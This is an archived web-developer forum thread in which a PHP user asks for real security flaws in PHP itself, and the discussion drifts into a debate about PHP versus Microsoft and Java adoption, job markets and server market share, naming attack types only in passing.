Security issues in PHP?

[jnichel]

Since the original thread was killed because I dared to break from the pack...locked after someone said their piece and called me a troll no less...it was suggested that a new thread be started to continue this conversation.

Anyway, before I'm banned because I dare to have a view opposite that of what seems to be the norm here, I'll ask again...

If anyone can shed some real life examples on security issues in PHP, I would really like to hear it. Not about in the way a user writes his/her code, cause I think we all will agree that bad code can kill just about anything, but about security problems with php itself.

ps If it takes your admins two days to figure out that they don't need 'TIER 1' support to boot into single-user mode and change a lost/hacked root password, then they need to be fired.

----
If a server crashes in the woods, and no one is around to hear it, is it still Windows?

[Tim Scarfe]

<blockquote id="quote"><span class="smalltext" id="quote">quote:<hr id="quote">Since the original thread was killed because I dared to break from the pack...locked after someone said their piece and called me a troll no less...it was suggested that a new thread be started to continue this conversation.<hr id="quote"></blockquote id="quote"></span id="quote">

jnichel,

<blockquote id="quote"><span class="smalltext" id="quote">quote:<hr id="quote">Anyway, before I'm banned<hr id="quote"></blockquote id="quote"></span id="quote">

We won't ban you. You are welcome here. I just won't get involved this time! Please continue to post here, your input is welcome.

Take care

--
Regards,
Tim Scarfe <tim@developer-x.com>
http://www.developer-x.com

[ttrenka]

ps If it takes your admins two days to figure out that they don't need 'TIER 1' support to boot into single-user mode and change a lost/hacked root password, then they need to be fired.

heh. I didn't say I agreed with that one either i thought those guys were idiots, but since we were consultants...(i'll give you an idea: they were running Cold Fusion on a 4 proc Sun Enterprise Server, and they compiled CF so that all requests would only work with one processor...)

look, how about we do this: if you are as knowledgeable about PHP security issues as you imply, how about you give us some comparison examples of the superiority of PHP's security over MS's. Something like "Using htaccess is more secure than Active Directory and IIS integration because...".

I close down threads that tend to get emotional because there ends up being a lot a words thrown out without anything backing them up. I may end up closing this one down too, who knows--because there's nothing more useless than people saying "this is better"..."no, THIS is better" without any reasons why.

So give us some examples. I'm listening (because I'm actually interested).

[jnichel]

<blockquote id="quote"><span class="smalltext" id="quote">quote:<hr id="quote">Originally posted by ttrenka

look, how about we do this: if you are as knowledgeable about PHP security issues as you imply, how about you give us some comparison examples of the superiority of PHP's security over MS's. Something like "Using htaccess is more secure than Active Directory and IIS integration because...".<hr id="quote"></blockquote id="quote"></span id="quote">

I gave that in the last thread. It really has little to do with ASP / .NET vs PHP, but more to do with the OS'. Just by the very nature of Windows, and the amount of access it will grant to scripts is more security prone than on a *nix system. This may not be the case for 2003 Server, as I've heard MS has made some major changes in the way permissions are handled, but I've never seen a running 2003 machine, so I can't speak to that. And I haven't used MS in the server world since '97, so I can't really speak to .htaccess vs Active Directory. But I'm not trying to compare the two...I only responded to others comparing them.

<blockquote id="quote"><span class="smalltext" id="quote">quote:<hr id="quote">So give us some examples. I'm listening (because I'm actually interested).<hr id="quote"></blockquote id="quote"></span id="quote">

I don't have any MS examples...I don't use it, and that's not what I'm here for. My main purpose for starting this thread was to get those who complained/hinted that PHP is an insecure way of creating web apps, to point out security issues they have found. I really don't care if .NET talks to MSSQL better than PHP, or if JSP parses XML documents faster than PHP. What I do care about is real life security issues in PHP. Like I said in the earlier thread, I use it on a daily basis, both personally and professionally, so if you know of a problem, I want to hear it. I don't care if y'all think it's a 'kiddie language', a 'joke', or only used for 'toilet paper inventory'...that's trolling, and does me no good in deciding if I have a issue that needs to be addressed in my place of work.

----
If a server crashes in the woods, and no one is around to hear it, is it still Windows?

[ttrenka]

and does me no good in deciding if I have a issue that needs to be addressed in my place of work.

Ah, see, that's different. Had you said that in the other thread, it would still be open. This last P of yours explains your concern very well...and I wouldn't regard this as trolling at all

As far as I know (and I haven't worked with PHP for a couple of years, so I'm not the person most knowledgeable about this) the security issues most would encounter are app-based (hence all the remarks)...like SQL Injection attacks, brute force password attacks (when not using the OS to handle the pwd), DoS attacks, etc. So when you are thinking of these, you (the proverbial you, not you personally) tend to think in terms of coding your app to be fairly secure.

Yes, MS has had a number of problems relating to buffer overruns...and I presume that most flavors of UNIX have not had these problems. But then most flavors of UNIX don't have an extensive UI over it, which in some ways is real good and in some ways (primarily in acceptance) pretty bad. How many corp users are going to want to use a console to do thier work? Remember after all that it wasn't until the release of Windows that MS really began the road to dominance (before that it was Apple that dominated the general public--NOT the pure programming set mind you (UNIX all the way!)).

Sure, there are lots of issues with MS. Doesn't really seem like nearly as much with the .NET Framework though.

I'm not a security expert though (cough Alex are you there cough), so I couldn't pinpoint the major issues with both systems. But I've become convinced that security is not MS's issue alone, they're just the target of choice. If OS X was the dominant OS, or Linux for that matter, I'm sure we'd be hearing about a lot more security flaws with those systems than we do.

As far as PHP being a kiddie language...hey, if you like Perl syntax, then more power to you. That's probably the main beef with it that most people who don't like it have. As far as a corp environment goes, I would say (once again) that it doesn't have the popularity that Java enjoys mainly because there aren't any major corporations behind it (that's what I meant by the Tier 1 comment). If there were...it would probably be a different story.

Sucks but true.

If you don't believe that, take a look in the national (US) job listings. I'd say it's about 75% Java listings and about 23% MS ones. If PHP were supported more, it would probably be different. But corps are a lot more likely to want Apache Tomcat around than PHP.

Of course, if you know different, please speak up.

[jnichel]

<blockquote id="quote"><span class="smalltext" id="quote">quote:<hr id="quote">Originally posted by ttrenka

and does me no good in deciding if I have a issue that needs to be addressed in my place of work.

Ah, see, that's different. Had you said that in the other thread, it would still be open. This last P of yours explains your concern very well...and I wouldn't regard this as trolling at all <hr id="quote"></blockquote id="quote"></span id="quote">

I did say that...

If you're willing to post some actual security problems with PHP...without the MS spin...I'm more than willing to listen, and discuss it. I use PHP daily in both personal and professional life (for a company that does more than one billion dollars a year in sales), and if there are security issues with it that have escaped our radar, I'd really like to know.

<blockquote id="quote"><span class="smalltext" id="quote">quote:<hr id="quote">Yes, MS has had a number of problems relating to buffer overruns...and I presume that most flavors of UNIX have not had these problems. But then most flavors of UNIX don't have an extensive UI over it, which in some ways is real good and in some ways (primarily in acceptance) pretty bad. How many corp users are going to want to use a console to do thier work? Remember after all that it wasn't until the release of Windows that MS really began the road to dominance (before that it was Apple that dominated the general public--NOT the pure programming set mind you (UNIX all the way!)).<hr id="quote"></blockquote id="quote"></span id="quote">

Don't confuse my usage of things like Linux, Apache, and PHP (we can throw MySQL in there to complete the LAMP), as a dislike for MS. You said in the last thread...'best tool for the job', and personally for the server world, I believe that best tool is a *nix system. For the desktop? Well, I'm typing this message in via a Win2k machine.

Corporations are not ready to replace their desktop machines, but they are ready to replace their servers (and are doing so). With the major changes outside of the U.S. in goverment's and businesses looking away from MS to Open Source solutions, it's going to have a huge impact on MS. Who knows, maybe it will light a fire under Redmond's ass, but they have alot of ground to make up in the server market. I think their desktop hold is safe for quite a few years to come, but they're on this ice in the server market...however, that was never their niche'.

<blockquote id="quote"><span class="smalltext" id="quote">quote:<hr id="quote">I'm not a security expert though (cough Alex are you there cough), so I couldn't pinpoint the major issues with both systems. But I've become convinced that security is not MS's issue alone, they're just the target of choice. If OS X was the dominant OS, or Linux for that matter, I'm sure we'd be hearing about a lot more security flaws with those systems than we do.<hr id="quote"></blockquote id="quote"></span id="quote">

No, security isn't just a MS issue, and there are vurnabilities with other OS', but like I said in the previous thread, the design of the OS makes the MS issues a bigger problem. Take my Win2k box here...there are many exploits out there that will give an attacker system wide access to my box by my opening an email, or going to a web page, because Windows allows so much permission to these items. Whereas with most other OS', if I pick up a malicious program (and I'm not logged in as root), the program is pretty much limited to my home directory. But hey, if the end users of the world would take the time to educate themselves about how to use their computers properly, we wouldn't have near these problems.

<blockquote id="quote"><span class="smalltext" id="quote">quote:<hr id="quote">As far as PHP being a kiddie language...hey, if you like Perl syntax, then more power to you. That's probably the main beef with it that most people who don't like it have.<hr id="quote"></blockquote id="quote"></span id="quote">

Well, I was a Perl programmer before I even heard of PHP, but both of them have their roots in C. But even if you don't like Perl, you can't knock it's power, flexiability, and longevity. I mean, how many languages have come and gone since Perl came on the scene? I think the problem that most people have with Perl today is that they we 'forced' to use it on the web (cgi scripts and all) a few years back, and even though Perl did a decent job, but that's never what the language was meant to do. However, I fail to see how PHP's syntax makes it a 'kiddie language'. Do you also consider Perl and C 'kiddie languages'?


<blockquote id="quote"><span class="smalltext" id="quote">quote:<hr id="quote">As far as a corp environment goes, I would say (once again) that it doesn't have the popularity that Java enjoys mainly because there aren't any major corporations behind it (that's what I meant by the Tier 1 comment). If there were...it would probably be a different story.<hr id="quote"></blockquote id="quote"></span id="quote">

This is apples and oranges. Java and PHP are designed to do two entirely different jobs. I'm willing to bet that PHP is running more web sites than Java....and that Java is running more back-end systems than PHP.

<blockquote id="quote"><span class="smalltext" id="quote">quote:<hr id="quote">Sucks but true.

If you don't believe that, take a look in the national (US) job listings. I'd say it's about 75% Java listings and about 23% MS ones. If PHP were supported more, it would probably be different. But corps are a lot more likely to want Apache Tomcat around than PHP.

Of course, if you know different, please speak up.
<hr id="quote"></blockquote id="quote"></span id="quote">

It would suck if it were true.

We all know Apache is the most popular web server, right? With almost 70% market share....

http://www.securityspace.com/s_surve...311/index.html

What's the most popular module for Apache?

http://www.securityspace.com/s_surve...pachemods.html

Yep, PHP. Over 50% of all Apache servers are running PHP. Hell, that means PHP is running on at least 35% of all web servers out there. I say at least because that URL only takes into account PHP running as a module on Apache....it doesn't count the Apache servers that are compiled with PHP, or the Windows versions of Apache running PHP, or the IIS servers running PHP, etc.

Tomcat? Less than 0.04%...not even close to PHP's 53.1% I just don't understand how y'all can think that corporations are not taking something like PHP seriously, when MAJOR corporations are using it as their web solution, and more than 1/3 of all webserver out there are using it.

However, I can talk about it til I'm blue in the face and I'm probably not going to change any minds around here, but that's neither here nor there....and not what I'm looking for.

----
If a server crashes in the woods, and no one is around to hear it, is it still Windows?

[ttrenka]

However, I fail to see how PHP's syntax makes it a 'kiddie language'. Do you also consider Perl and C 'kiddie languages'?
Yeah, actually, I never said that either. I don't consider any of the above kiddie languages. Using a period as a string concatenator drives me nuts, though.

I will say that the specs you've got there have to be taken with a grain of salt. I think when people refer to PHP as a "kiddie" language, a large part of the misperception stems from the fact that more than a few personal sites use the PHP/Apache modules, and I've seen at least 3 studies in the past year say the same basic thing as the one you site...except there's no discrimination as to the purpose of the server.

I don't think corporations are taking it seriously because I haven't heard of *anyone* who's been able to sell a medium to high-end PHP solution. It's that simple. 8 out of 10 people I get to network with regularly tell me (and this is the reason why I personally have not focused on PHP as a primary skill) that they can't sell a PHP solution to a company. With the last consulting company I was with, we did no less than 52 projects over a 5 year period--and only one was a PHP job.

I'm looking in the marketplace now, seeing if there's something better for me to go to, and all I see is...Java / Websphere. 75% of the listings I've seen, or the companies I've talked to, are looking for that skill.

Dude, if I thought I could make $85k a year doing PHP, I would. I don't see that right now. Maybe in the future, but not right now.

Still, not sure what this has to do with security.

[jnichel]

<blockquote id="quote"><span class="smalltext" id="quote">quote:<hr id="quote">Originally posted by ttrenka

However, I fail to see how PHP's syntax makes it a 'kiddie language'. Do you also consider Perl and C 'kiddie languages'?
Yeah, actually, I never said that either. I don't consider any of the above kiddie languages. Using a period as a string concatenator drives me nuts, though.<hr id="quote"></blockquote id="quote"></span id="quote">

Personally I like that. I mean, I've never actually written any worthwhile Java or C++, but it would seem to me that you can get some unexpected results with '+' being used for both concatenation and mathematical operations. I guess if you're used to it though, it seems more natural.

<blockquote id="quote"><span class="smalltext" id="quote">quote:<hr id="quote">I will say that the specs you've got there have to be taken with a grain of salt. I think when people refer to PHP as a "kiddie" language, a large part of the misperception stems from the fact that more than a few personal sites use the PHP/Apache modules, and I've seen at least 3 studies in the past year say the same basic thing as the one you site...except there's no discrimination as to the purpose of the server.<hr id="quote"></blockquote id="quote"></span id="quote">

This was the same for Apache not so long ago. It was just used in personal sites...by the techno-geeks.

<blockquote id="quote"><span class="smalltext" id="quote">quote:<hr id="quote">I don't think corporations are taking it seriously because I haven't heard of *anyone* who's been able to sell a medium to high-end PHP solution. It's that simple. 8 out of 10 people I get to network with regularly tell me (and this is the reason why I personally have not focused on PHP as a primary skill) that they can't sell a PHP solution to a company. With the last consulting company I was with, we did no less than 52 projects over a 5 year period--and only one was a PHP job.<hr id="quote"></blockquote id="quote"></span id="quote">

I get to see the other side of the fence. The company I work for expanded from just a hardware supplier to a solutions provider two years ago, and the major part of that service is us developing custom php web solutions for our clients. We've grown from an 8 man team in 2001 to a 23 member team now, due to the amount of clients that are looking for this exact type of solution. Granted, not all of our clients want this...some do opt for a solution that's backed by MS, Sun, IBM, etc., but it's a pretty even split at my company.


<blockquote id="quote"><span class="smalltext" id="quote">quote:<hr id="quote">I'm looking in the marketplace now, seeing if there's something better for me to go to, and all I see is...Java / Websphere. 75% of the listings I've seen, or the companies I've talked to, are looking for that skill.<hr id="quote"></blockquote id="quote"></span id="quote">

Those technologies have also been in the limelight longer than PHP, and have major money backing them to get the word out. PHP, like Apache and Linux in their beginnings, is largely word of mouth. Whereas things like Java/jsp, .NET, etc. have suits going to businesses promoting their product. To me, that speaks volumes for PHP; expanding the way it has without marketing muscle.

<blockquote id="quote"><span class="smalltext" id="quote">quote:<hr id="quote">Dude, if I thought I could make $85k a year doing PHP, I would. I don't see that right now. Maybe in the future, but not right now.<hr id="quote"></blockquote id="quote"></span id="quote">

Sorry, can't help you there. I'm only at $72k, and am classified as a senior project manager...our php programmers make in the mid to upper 50's.

<blockquote id="quote"><span class="smalltext" id="quote">quote:<hr id="quote">Still, not sure what this has to do with security.<hr id="quote"></blockquote id="quote"></span id="quote">

Nothing acutally, kind of like my LSU Tigers possibly getting a chance for the national title has nothing to do with it either (had to throw that in since I'm not on the ESPN forums at the moment . I'm just addressing the topics you brought up in the previous post...kind of like I'm doing now. I've kind of given up on someone posting the security problems they hinted to in the original thread. I figure if there were some major security problems, someone would have posted it by now, since the open source community seems to be in the minority on these forums.

----
If a server crashes in the woods, and no one is around to hear it, is it still Windows?

[ttrenka]

I figure if there were some major security problems, someone would have posted it by now, since the open source community seems to be in the minority on these forums.

Yep, someone would have posted it. Although this really isn't a forum for those doing server-side work. Most of the people here (when they've delved into it) have been doing either ASP or PHP, so there are some...but I don't think anyone (aside from Dan) would call themselves an expert. And the one security guy I do know (cough ALEX cough) doesn't seem to visit anymore. Has nothing to do with the open source community being here or not

To be honest, it's probably a good, healthy mix. At least you can still pick a fight and not get swamped.

[aspfreakout]

So you just want some security issues? (didn't read the whole thread...)

fopen()
sql injection (d'oh)
...
there are many but you have to tell what kind of exploits you want,... real attacks(brute force, ddos) or code bugs?


Maybe it's just you, looking bad!